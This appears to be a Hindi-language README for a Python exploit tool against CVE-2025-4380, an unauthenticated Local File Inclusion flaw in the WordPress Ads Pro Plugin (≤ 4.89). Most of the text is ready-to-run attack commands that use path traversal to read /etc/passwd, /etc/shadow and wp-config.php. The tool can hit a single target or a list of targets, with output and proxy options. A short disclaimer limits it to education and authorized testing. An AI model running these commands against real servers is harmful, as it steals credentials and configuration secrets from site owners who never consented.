
यह Python एक्सप्लॉइट WordPress के लिए Ads Pro Plugin ≤ 4.89 को टार्गेट करता है, जो bsa_preview_callback AJAX एक्शन के माध्यम से Local File Inclusion (LFI) भेद्यता के प्रति संवेदनशील है।
बिना प्रमाणीकरण वाला हमलावर इसका उपयोग करके सर्वर फाइल सिस्टम से किसी भी फ़ाइल को पढ़ सकता है, जिसमें /etc/passwd, wp-config.php जैसी संवेदनशील फ़ाइलें और अन्य शामिल हैं।
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd
python3 cve_2025_4380.py -l targets.txt -p ../../../../etc/shadow
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd -o output.txt
python3 cve_2025_4380.py -u http://target.com -p ../../../../etc/passwd --proxy http://127.0.0.1:8080
Burpsuite अनुरोध/प्रतिक्रिया
CVE-2025-4380
Ads Pro Plugin <= 4.89 - bsa_preview_callback में bsa_template के माध्यम से Local File Inclusion
यह एक्सप्लॉइट केवल शैक्षिक उद्देश्यों और अधिकृत सुरक्षा परीक्षण के लिए प्रदान किया गया है।
| Argument | Description | Required |
|---|
-u, --url | टार्गेट URL (जैसे, http://target.com) | वैकल्पिक |
-l, --list | टार्गेट URL की सूची वाली फ़ाइल | वैकल्पिक |
-p, --path | शामिल करने के लिए फ़ाइल पथ (जैसे, ../../etc/passwd) | हाँ |
-o, --output | परिणाम सहेजने के लिए आउटपुट फ़ाइल | वैकल्पिक |
--proxy | प्रॉक्सी (जैसे, http://127.0.0.1:8080) | वैकल्पिक |